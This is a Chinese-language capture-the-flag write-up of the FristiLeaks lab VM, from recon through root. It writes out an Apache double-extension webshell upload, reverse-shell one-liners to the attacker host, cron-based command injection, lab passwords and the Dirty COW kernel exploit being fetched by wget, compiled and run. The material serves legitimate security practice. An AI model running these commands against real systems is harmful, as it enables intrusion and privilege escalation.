靶场搭建
下载下来是个OVA,通过虚拟机的打开,导入OVA虚拟机,导入的过程中会报一次错,直接点重试就可以。
导入进去后添加一个网卡,使用NAT模式,并且需要将这张NAT模式的网卡的MAC地址设置为08:00:27:A5:A6:76。在设置中的高级选项卡内
环境配置可见:https://blog.csdn.net/weixin_45744814/article/details/120168008
IP地址:192.168.74.138
信息收集
nmap
做一个全端口快速saomiao
┌──(root㉿kali)-[~]
└─# nmap -p- -T5 192.168.74.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 04:08 EDT
Nmap scan report for bogon (192.168.74.138)
Host is up (0.00045s latency).
Not shown: 65479 filtered tcp ports (no-response), 55 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 71.77 seconds发现只开了80端口,这就有点意思了,多半是要做web安全噜
dirsearch
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.138
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_192.168.74.138/_24-04-08_04-10-32.txt
Target: http://192.168.74.138/
[04:10:38] Starting:
[04:10:41] 403 - 213B - /.ht_wsr.txt
[04:10:41] 403 - 216B - /.htaccess.bak1
[04:10:41] 403 - 218B - /.htaccess.sample
[04:10:41] 403 - 216B - /.htaccess.save
[04:10:41] 403 - 217B - /.htaccess_extra
[04:10:41] 403 - 216B - /.htaccess_orig
[04:10:41] 403 - 216B - /.htaccess.orig
[04:10:41] 403 - 214B - /.htaccess_sc
[04:10:41] 403 - 214B - /.htaccessOLD
[04:10:41] 403 - 207B - /.html
[04:10:41] 403 - 206B - /.htm
[04:10:41] 403 - 214B - /.htaccessBAK
[04:10:41] 403 - 215B - /.htaccessOLD2
[04:10:41] 403 - 216B - /.htpasswd_test
[04:10:41] 403 - 212B - /.htpasswds
[04:10:41] 403 - 213B - /.httr-oauth
[04:11:04] 403 - 210B - /cgi-bin/
[04:11:13] 403 - 208B - /error/
[04:11:19] 301 - 237B - /images -> http://192.168.74.138/images/
[04:11:19] 200 - 1KB - /images/
[04:11:40] 200 - 62B - /robots.txt
Task Completeddirsearch扫了一下也并没有发现什么很有价值的东西
nikto
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.138
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.74.138
+ Target Hostname: 192.168.74.138
+ Target Port: 80
+ Start Time: 2024-04-08 04:10:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8911 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2024-04-08 04:11:32 (GMT-4) (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testednikto提示我们在robots.txt中有一些东西可能感兴趣
想象力
三个目录,点开都是一张突图片,难道是隐写术?没道理啊==、
瞧了一眼别人的解题,发现是让我们自己找路径==、给的提示就是THIS IS NOT THE URL以及首页的图片。
好吧这也算是信息收集的一部分,真抽象啊
猜一猜猜出来http://192.168.74.138/fristi/这个了。像我这种缺乏想象力的人真的头疼,想过用爬虫但是这个页面太分散了,估计也爬不出来,要么就是枚举。但是为什么要去做枚举呢?没有任何道理啊!
图片
拿到这这个路径之后打卡看了看,发现是个登录口,感到了困惑
那么现在做两个尝试,SQL注入和信息收集,我感觉这个靶场偏搞怪,F12看了一下源代码,发现里面有注释,是Base64编码,转了一下发现是个图片,打开图片看了看,里面的文字是:keKkeKKeKKeKkEkkEk。不确定作用,感觉是嘲讽,尝试当做密码和路径都没有结果
回到dirsearch中对这个路径在扫一下,发现uploads文件夹,但是没有办法直接访问,说明至少后面有文件上传的内容
思路很卡,翻了半天直接打开了HTML源码瞅了瞅,发现还有一个注释没看见
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->发现有一个人交eezeepz,那么就直接登录了
账号密码:eezeepz/keKkeKKeKKeKkEkkEk
漏洞利用
文件上传
登录进去之后果然就是一个文件上传页面
随便上传一个php文件,发现有限制,后端验证。那就要结合收集到的信息做文件上传绕过了,apache 2.2.15版本的,干他
查了一下,apache有解析漏洞,靶场使用了白名单过滤且没有进行文件名重命名。这样可以通过修改后缀名进行上传。上传一个1.php.jpg的一句话木马,虽然后缀是jpg但是会按照php解析。使用蚁剑连接就拿到了低权限shell。
需要去回顾apache的解析漏洞,并且构建利用方式,已经记不清楚了
提权
拿到apache的shell之后就要进行提权了
通过提示sudo提权
查看用户发现存在三个用户
其中的eezeepz用户目录可以访问,打开后里面有一个notes.txt进行提示
内容:Jerry设置了一些自动化检查任务供您使用,但他只允许您访问/usr/bin/*系统二进制文件。然而,他还复制了一些常用命令到他的家目录:chmod、df、cat、echo、ps、grep、egrep,这些命令您可以从/home/admin/目录中使用。要运行这些命令,您需要在/tmp/目录中创建一个名为"runthis"的文件,每行一个命令。输出将被存储在/tmp/目录中的名为"cronresult"的文件中。这些命令应该每分钟以Jerry的账户权限运行。
所以我们在/tmp/runthis设置命令,每分钟Jerry的admin权限都会去执行
我在想需要用到定时任务吗?
我尝试用apache账号做一些操作,比如查看有没有sudo权限,结果sudo -l还需要交互shell。我通过反弹Bash TCP弹出来:bash -i >& /dev/tcp/192.168.74.129/1234 0>&1,使用python提供构建交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'。然后执行sudo -l发现还需要密码。
使用apache账号除非直接用内核提权脚本不然估计不行
还是走计划任务里admin账号权限看看
尝试echo "/usr/bin/../../bin/bash -i > /dev/tcp/192.168.74.129/4455 0<& 2>&1" > /tmp/runthis获取shell,但是不行,监听的nc直接就死了,不知道什么原因,我猜是因为tty并不全的原因,知道的老哥踢我
直接把admin的home目录设置成所有用户可访问拉倒了:echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
一分钟后就可以进入admin目录下了,进入admin目录下看到有一些敏感的文件
bash-4.1$ cat /home/admin/whoisyourgodnow.txt
cat /home/admin/whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
bash-4.1$ cat /home/admin/cryptedpass.txt
cat /home/admin/cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat /home/admin/cryptpass.py
cat /home/admin/cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult编写解密函数对两个密码进行解密
#decoderot13.py
import base64,codecs,sys
def decodeString(str):
base64string= codecs.decode(str,'rot13')
return base64.b64decode(base64string[::-1])
cryptoResult=decodeString(sys.argv[1])
print cryptoResult得到两个密码:LetThereBeFristi!和thisisalsopw123,分别是fristigod和admin的密码
登录fristigod账号
[admin@localhost uploads]$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod我之前在admin上找过了,没有sudo权限,fristigod账号上有
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom可以通过sudo使用fristi身份运行/var/fristigod/.secret_admin_stuff/doCom,能够以root权限打开一个bash,就最终拿到root权限了
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# whoami
whoami
root脏牛提权
搜一下脏牛提权的代码
──(root㉿kali)-[~]
└─# searchsploit dirty
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Paper Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles | docs/english/42430-dirtytooth-ex
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------符合内核版本的都可以用,我用了那个40839.c
┌──(root㉿kali)-[~]
└─# service apache2 start
┌──(root㉿kali)-[~]
└─# cp 40839.c /var/www/htmlbash-4.1$ wget http://192.168.74.129/40839.c -O 40839.c
wget http://192.168.74.129/40839.c -O 40839.c
bash-4.1$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123456
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash
mmap: 7fa407cb0000┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.138] 37326
bash: no job control in this shell
bash-4.1$ su firefart
su firefart
standard in must be a tty
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
bash-4.1$ su firefart
su firefart
Password: 123456
[firefart@localhost uploads]# 拿到了root权限
注意编译的时候需要加参数的!
这个命令是使用
gcc编译器来编译一个名为40839.c的源代码文件,并生成一个名为dirty的可执行文件。具体解释如下:
gcc:是 GNU Compiler Collection 的缩写,是一个常用的 C 语言编译器。-pthread:选项用于指示编译器链接 POSIX 线程库,以支持多线程编程。40839.c:是源代码文件的名称,通常以.c作为 C 语言源文件的扩展名。-o dirty:选项用于指定生成的可执行文件的名称为dirty。-lcrypt:选项用于指示编译器链接libcrypt库,该库提供了密码加密和验证功能。综合起来,这个命令的目的是编译
40839.c这个源代码文件,生成一个名为dirty的可执行文件,并在编译过程中链接libcrypt库以支持密码加密和验证功能。
小结
- rot13加密
- 查找有用的信息
- 脏牛提权
- apache解析漏洞
急需复盘apache历史漏洞!研究综合利用方式。